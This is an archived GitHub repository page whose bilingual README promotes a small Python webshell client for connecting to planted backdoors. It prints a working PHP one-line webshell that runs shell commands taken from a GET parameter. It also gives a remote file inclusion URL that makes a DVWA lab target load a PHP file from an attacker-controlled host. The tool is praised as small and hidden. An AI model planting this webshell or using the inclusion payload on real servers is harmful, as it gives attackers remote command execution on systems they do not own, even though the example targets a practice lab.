Skip to content
This repository has been archived by the owner on Oct 3, 2021. It is now read-only.
/ WebShell Public archive

WebShell 可以连接 一句话木马,文件包含漏洞等。基于python3编写。小巧好用。Can connect a sentence Trojan, files containing vulnerabilities, etc. Written in Python 3. Small to use

License

Notifications You must be signed in to change notification settings

FengZi-lv/WebShell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 

Repository files navigation

WebShell v1.0

If you like it, please give me a Star

如果你喜欢它 , 请给我一个Star

不喜自喷

适用于一句话木马等一系列webshell

  • 支持GET请求的一句话木马
  • 小巧隐蔽
  • (编不下去了

木马格式 :

1 . PHP

<? @echo(shell_exec($_GET['CMD']))

2 . 文件包含

http://192.168.1.150/DVWA/vulnerabilities/fi/?page=http://192.168.1.127:8000/http://192.168.1.150/DVWA/vulnerabilities/fi/?page=http://192.168.1.127:8000/include.php
# include.php同上

使用方法:

在终端使用python命令运行

需要安装requests类库

1.png 2.png

缺点 : 没有办法输入交互

In the end,enjoy it!

(2021 1 31 我的第一个github项目

English Document

Machine translation follows

Applicable to a series of webshells such as a Trojan sentence

  • A one-sentence Trojan that supports GET requests

  • Small hidden


Trojan Format :

1 . PHP

<? @echo(shell_exec($_GET['CMD']))

2 . File Inclusion

http://192.168.1.150/DVWA/vulnerabilities/fi/?page=http://192.168.1.127:8000/http://192.168.1.150/DVWA/vulnerabilities/fi/?page=http://192.168.1.127:8000/include.php
# 'include.php' Same as above

Usage:

Run it from the terminal using 'python' commands

** Requires installing the 'Requests' class library **


1.png 2.png

Cons: No way to enter interaction

In the end,enjoy it!

(2021 1 31 My first GitHub project

About

WebShell 可以连接 一句话木马,文件包含漏洞等。基于python3编写。小巧好用。Can connect a sentence Trojan, files containing vulnerabilities, etc. Written in Python 3. Small to use

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages